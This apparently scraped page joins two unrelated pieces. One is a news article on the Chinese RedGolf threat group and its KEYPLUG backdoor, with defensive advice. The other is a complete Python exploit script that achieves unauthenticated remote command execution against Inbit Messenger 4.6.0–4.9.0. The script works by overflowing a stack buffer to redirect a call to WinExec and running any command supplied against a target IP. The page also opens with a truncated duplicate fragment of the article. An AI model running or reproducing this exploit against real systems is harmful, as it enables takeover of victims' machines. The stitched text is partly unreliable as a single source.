"RedGolf is a particularly prolific Chinese state-sponsored threat actor group that has likely been active for many years against a wide range of industries globally," Recorded Future told The Hacker News.
"The group has shown the ability to

Endpoint Security / Malware

A Chinese state-sponsored threat activity group tracked as **RedGolf** has been attributed to the use of a custom Windows and Linux backdoor called KEYPLUG.

"RedGolf is a particularly prolific Chinese state-sponsored threat actor group that has likely been active for many years against a wide range of industries globally," Recorded Future told The Hacker News.

"The group has shown the ability to rapidly weaponize newly reported vulnerabilities (e.g. Log4Shell and ProxyLogon) and has a history of developing and using a large range of custom malware families."

The use of KEYPLUG by Chinese threat actors was first disclosed by Google-owned Manidant in March 2022 in attacks targeting multiple U.S. state government networks between May 2021 and February 2022.

Then in October 2022, Malwarebytes detailed a separate set of attacks targeting government entities in Sri Lanka in early August that leveraged a novel implant dubbed DBoxAgent to deploy KEYPLUG.

Both these campaigns were attributed to Winnti (aka APT41, Barium, Bronze Atlas, or Wicked Panda), which Recorded Future said "closely overlaps" with RedGolf.

"We have not observed specific victimology as part of the latest highlighted RedGolf activity," Recorded Future said. "However, we believe this activity is likely being conducted for intelligence purposes rather than financial gain due to the overlaps with previously reported cyberespionage campaigns."

The cybersecurity firm, in addition to detecting a cluster of KEYPLUG samples and operational infrastructure (codenamed GhostWolf) used by the hacking group from at least 2021 to 2023, noted its use of other tools like Cobalt Strike and PlugX.

The GhostWolf infrastructure, for its part, consists of 42 IP addresses that function as KEYPLUG command-and-control. The adversarial collective has also been observed utilizing a mixture of both traditionally registered domains and Dynamic DNS domains, often featuring a technology theme, to act as communication points for Cobalt Strike and PlugX.

"RedGolf will continue to demonstrate a high operational tempo and rapidly weaponize vulnerabilities in external-facing corporate appliances (VPNs, firewalls, mail servers, etc.) to gain initial access to target networks," the company said.

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

"Additionally, the group will likely continue to adopt new custom malware families to add to existing tooling such as KEYPLUG."

To defend against RedGolf attacks, organizations are recommended to apply patches regularly, monitor access to external facing network devices, track and block identified command-and-control infrastructure, and configure intrusion detection or prevention systems to monitor for malware detections.

The findings come as Trend Micro revealed that it discovered more than 200 victims of Mustang Panda (aka Earth Preta) attacks as part of a far-reaching cyber espionage effort orchestrated by various sub-groups since 2022.

A majority of the cyber strikes have been detected in Asia, followed by Africa, Europe, the Middle East, Oceania, North America, and South America.

"There are strong indications of intertwined traditional intelligence tradecraft and cyber collection efforts, indicative of a highly coordinated and sophisticated cyber espionage operation," Trend Micro said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese RedGolf Group Targeting Windows and Linux Systems with KEYPLUG Backdoor

Inbit Messenger versions 4.6.0 through 4.9.0 suffer from an unauthenticated remote command execution vulnerability.

    # Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE)# Date: 11/08/2022# Exploit Author: a-rey # Vendor Homepage: http://www.inbit.com/support.html# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html# Version: v4.6.0 - v4.9.0# Tested on: Windows XP SP3, Windows 7, Windows 10, Windows Server 2019# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md#!/usr/bin/env python3# -*- coding: utf-8 -*-import sys, socket, struct, string, argparse, loggingBANNER = """\033[0m\033[1;35m╔══════════════════════════════════════════════════════════════════════════╗║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote Command Execution \033[1;35m║╚══════════════════════════════════════════════════════════════════════════╝\033[0m by: \033[1;36m █████╗      ██████╗ ███████╗██╗   ██╗     \033[1;36m██╔══██╗     ██╔══██╗██╔════╝██║   ██║     \033[1;36m███████║ ███ ██████╔╝█████╗   ██╗ ██═╝     \033[1;36m██╔══██║     ██╔══██╗██╔══╝     ██╔╝       \033[1;36m██║  ██║     ██║  ██║███████╗   ██║        \033[1;36m╚═╝  ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝   \033[0m"""# NOTE: IAT addresses for KERNEL32!WinExec in IMS.EXE by build numberTARGETS = {  4601 : 0x005f3360,  4801 : 0x005f7364,  4901 : 0x005f7364,}# NOTE: min and max values for length of commandCMD_MIN_LEN = 10CMD_MAX_LEN = 0xfc64# NOTE: these bytes cannot be in the calculated address of WinExec to ensure overflowBAD_BYTES = b"\x3e" # >def getWinExecAddress(targetIp:str, targetPort:int) -> bytes:  # NOTE: send packet with client build number of 4601 for v4.6.0  pkt = b"<50><0><IM><ID>7</ID><a>1</a><b>4601</b><c>1</c></IM>\x00"  logging.info(f"trying to get version information from {targetIp}:{targetPort} ...")  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((targetIp, targetPort))  s.send(pkt)  _d = s.recv(1024)  # find build tag in response  if b'<c>' not in _d:    logging.error(f"invalid version packet received: {_d}")    sys.exit(-1)  s.close()  try:    build = int(_d[_d.index(b'<c>') + 3:_d.index(b'</c>')])  except:    logging.error(f"failed to parse build number from packet: {_d}")    sys.exit(-1)  # get the IAT offset   if build not in TARGETS.keys():    logging.error(f"unexpected build number: {build}")    sys.exit(-1)  # NOTE: we need to subtract 0x38 since the vulnerable instruction is 'CALL [EAX + 0x38]'  winexec = struct.pack("<I", TARGETS[build] - 0x38)  logging.success(f"target build number is {build}")  logging.info(f"WinExec @ 0x{TARGETS[build] - 0x38:08x}")  # sanity check for bad bytes in WinExec address  for c in winexec:    if c in BAD_BYTES:      logging.error(f"found bad byte in WinExec address: 0x{TARGETS[build] - 0x38:08x}")      sys.exit(-1)  return winexecdef exploit(targetIp:str, targetPort:int, command:bytes) -> None:  # NOTE: command must be NULL terminated  command += b"\x00"  # check user command length  if len(command) < CMD_MIN_LEN:    logging.error(f"command length must be at least {CMD_MIN_LEN} characters")    sys.exit(-1)  if len(command) >= CMD_MAX_LEN:    logging.error(f"command length must be less than {CMD_MAX_LEN} characters")    sys.exit(-1)  # get WinExec address  winexec = getWinExecAddress(targetIp, targetPort)  # get a string representation of the length of the command data after the <> tag parsed by atol()  pktLen = str(len(command))  pkt  = b"<"            # start of XML tag/stack overflow  pkt += pktLen.encode() # number parsed by atol() & length of command data following '>' character  pkt += b"\x00"         # NULL terminator to force atol to ignore what comes next  # NOTE: adjust the 85 byte offset calculated that assumes a 2 byte string passed to atol()  pkt += (b"A" * (85 - (len(pktLen) - 2))) # padding up to function pointer overwrite  pkt += winexec                           # indirect function pointer we control  pkt += b">"                              # end of XML tag/stack overflow  pkt += command                           # the command set to the call to WinExec()  logging.info(f"sending payload to {targetIp}:{targetPort} ...")  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  s.connect((targetIp, targetPort))  s.send(pkt)  s.close()  logging.success("DONE")if __name__ == '__main__':  # parse arguments  parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)  parser.add_argument('-t', '--target',  help='target IP',      type=str, required=True)  parser.add_argument('-c', '--command', help='command to run', type=str, required=True)  parser.add_argument('-p', '--port',    help='target port',    type=int, required=False, default=10883)  args = parser.parse_args()  # define logger  logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO')  logging.SUCCESS = logging.CRITICAL + 1  logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')  logging.addLevelName(logging.ERROR,   '\033[0m\033[1;31mFAIL\033[0m')  logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')  logging.addLevelName(logging.INFO,    '\033[0m\033[1;36mINFO\033[0m')  logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)  # print banner  print(BANNER)  # run exploit  exploit(args.target, args.port, args.command.encode())

Tag

#windows